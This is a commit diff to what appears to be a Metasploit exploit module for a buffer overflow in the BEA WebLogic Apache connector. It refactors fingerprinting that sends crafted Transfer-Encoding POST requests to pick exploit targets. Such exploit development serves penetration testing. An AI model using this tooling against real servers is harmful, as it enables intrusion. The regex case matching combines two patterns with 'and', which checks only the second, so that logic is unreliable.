trying to improve bea weblogic connector bof
parent
c0d17734ed
commit
e7f5bf132c
|
@ -22,12 +22,14 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
Weblogic Apache plugin.
|
Weblogic Apache plugin.
|
||||||
|
|
||||||
The connector fails to properly handle specially crafted HTTP POST
|
The connector fails to properly handle specially crafted HTTP POST
|
||||||
requests, resulting a buffer overflow due to the insecure usage
|
requests resulting in a buffer overflow due to the insecure usage
|
||||||
of sprintf. Currently, this module works over Windows systems without DEP,
|
of sprintf.
|
||||||
and has been tested with Windows 2000 / XP.
|
|
||||||
|
|
||||||
In addition, the Weblogic Apache plugin version is fingerprinted with a POST
|
The Weblogic Apache plugin version is fingerprinted with a POST
|
||||||
request containing a specially crafted Transfer-Encoding header.
|
request containing a specially crafted Transfer-Encoding header.
|
||||||
|
|
||||||
|
At this moment this module works over Windows systems without DEP
|
||||||
|
and has been tested with Windows 2000 / XP.
|
||||||
},
|
},
|
||||||
'Author' =>
|
'Author' =>
|
||||||
[
|
[
|
||||||
|
@ -84,52 +86,24 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
||||||
def check
|
def check
|
||||||
|
|
||||||
my_data = rand_text_alpha(rand(5) + 8)
|
fingerprint = fingerprint_mod_wl
|
||||||
res = send_request_cgi({
|
|
||||||
'method' => 'POST',
|
|
||||||
'uri' => target_uri.path,
|
|
||||||
'headers' =>
|
|
||||||
{
|
|
||||||
'Transfer-Encoding' => my_data
|
|
||||||
},
|
|
||||||
'data' => "#{my_data.length}\r\n#{my_data}\r\n0\r\n",
|
|
||||||
})
|
|
||||||
|
|
||||||
if res and res.code == 200
|
case fingerprint
|
||||||
|
when /Version found/
|
||||||
# BEA WebLogic 8.1 SP6 - mod_wl_20.so
|
|
||||||
if res.body =~ /Build date\/time:<\/B> <I>Jun 16 2006 15:14:11/ and
|
|
||||||
res.body =~ /Change Number:<\/B> <I>779586/
|
|
||||||
return Exploit::CheckCode::Vulnerable
|
return Exploit::CheckCode::Vulnerable
|
||||||
end
|
when /BEA WebLogic connector vulnerable/
|
||||||
|
|
||||||
# BEA WebLogic 8.1 SP5 - mod_wl_20.so
|
|
||||||
if res.body =~ /Build date\/time:<\/B> <I>Aug 5 2005 11:19:57/ and
|
|
||||||
res.body =~ /Change Number:<\/B> <I>616810/
|
|
||||||
return Exploit::CheckCode::Vulnerable
|
|
||||||
end
|
|
||||||
|
|
||||||
# BEA WebLogic 8.1 SP4 - mod_wl_20.so
|
|
||||||
if res.body =~ /Build date\/time:<\/B> <I>Oct 25 2004 09:25:23/ and
|
|
||||||
res.body =~ /Change Number:<\/B> <I>452998/
|
|
||||||
return Exploit::CheckCode::Vulnerable
|
|
||||||
end
|
|
||||||
|
|
||||||
# Check for dates prior to patch release
|
|
||||||
if res.body =~ /([A-Za-z]{3} [\s\d]{2} [\d]{4})/
|
|
||||||
build_date = Date.parse($1)
|
|
||||||
if build_date <= Date.parse("Jul 28 2008")
|
|
||||||
return Exploit::CheckCode::Appears
|
return Exploit::CheckCode::Appears
|
||||||
end
|
when /BEA WebLogic connector undefined/
|
||||||
end
|
return Exploit::CheckCode::Detected
|
||||||
|
when /BEA WebLogic connector no vulnerable/, /BEA WebLogic connector not found/
|
||||||
end
|
|
||||||
|
|
||||||
return Exploit::CheckCode::Safe
|
return Exploit::CheckCode::Safe
|
||||||
end
|
end
|
||||||
|
|
||||||
|
end
|
||||||
|
|
||||||
def exploit
|
def exploit
|
||||||
|
|
||||||
# Autodetect BEA mod_wl version
|
# Autodetect BEA mod_wl version
|
||||||
|
@ -159,6 +133,23 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
return target if target.name != 'Automatic'
|
return target if target.name != 'Automatic'
|
||||||
|
|
||||||
|
fingerprint = fingerprint_mod_wl
|
||||||
|
|
||||||
|
case fingerprint
|
||||||
|
when /BEA WebLogic 8.1 SP6 - mod_wl_20.so/
|
||||||
|
return targets[1]
|
||||||
|
when /BEA WebLogic 8.1 SP5 - mod_wl_20.so/
|
||||||
|
return targets[2]
|
||||||
|
when /BEA WebLogic 8.1 SP4 - mod_wl_20.so/
|
||||||
|
return targets[3]
|
||||||
|
else
|
||||||
|
return nil
|
||||||
|
end
|
||||||
|
|
||||||
|
end
|
||||||
|
|
||||||
|
def fingerprint_mod_wl
|
||||||
|
|
||||||
my_data = rand_text_alpha(rand(5) + 8)
|
my_data = rand_text_alpha(rand(5) + 8)
|
||||||
res = send_request_cgi(
|
res = send_request_cgi(
|
||||||
{
|
{
|
||||||
|
@ -171,22 +162,31 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
'data' => "#{my_data.length}\r\n#{my_data}\r\n0\r\n",
|
'data' => "#{my_data.length}\r\n#{my_data}\r\n0\r\n",
|
||||||
})
|
})
|
||||||
|
|
||||||
if res and res.code == 200
|
if res and res.code == 200 and res.body =~ /Weblogic Bridge Message/
|
||||||
# BEA WebLogic 8.1 SP6 - mod_wl_20.so
|
# BEA WebLogic 8.1 SP6 - mod_wl_20.so
|
||||||
if res.body =~ /Build date\/time:<\/B> <I>Jun 16 2006 15:14:11/ and
|
case res.body
|
||||||
res.body =~ /Change Number:<\/B> <I>779586/
|
when (/Build date\/time:<\/B> <I>Jun 16 2006 15:14:11/ and /Change Number:<\/B> <I>779586/)
|
||||||
return targets[1]
|
return "Version found: BEA WebLogic 8.1 SP6 - mod_wl_20.so"
|
||||||
# BEA WebLogic 8.1 SP5 - mod_wl_20.so
|
# BEA WebLogic 8.1 SP5 - mod_wl_20.so
|
||||||
elsif res.body =~ /Build date\/time:<\/B> <I>Aug 5 2005 11:19:57/ and
|
when (/Build date\/time:<\/B> <I>Aug 5 2005 11:19:57/ and /Change Number:<\/B> <I>616810/)
|
||||||
res.body =~ /Change Number:<\/B> <I>616810/
|
return "Version found: BEA WebLogic 8.1 SP5 - mod_wl_20.so"
|
||||||
return targets[2]
|
when (/Build date\/time:<\/B> <I>Oct 25 2004 09:25:23/ and /Change Number:<\/B> <I>452998/)
|
||||||
elsif res.body =~ /Build date\/time:<\/B> <I>Oct 25 2004 09:25:23/ and
|
return "Version found: BEA WebLogic 8.1 SP4 - mod_wl_20.so"
|
||||||
res.body =~ /Change Number:<\/B> <I>452998/
|
# Check for dates prior to patch release
|
||||||
return targets[3]
|
when /([A-Za-z]{3} [\s\d]{2} [\d]{4})/
|
||||||
|
build_date = Date.parse($1)
|
||||||
|
if build_date <= Date.parse("Jul 28 2008")
|
||||||
|
return "BEA WebLogic connector vulnerable"
|
||||||
|
else
|
||||||
|
return "BEA WebLogic connector no vulnerable"
|
||||||
|
end
|
||||||
|
else
|
||||||
|
return "BEA WebLogic connector undefined"
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
return nil
|
return "BEA WebLogic connector not found"
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
Loading…
Reference in New Issue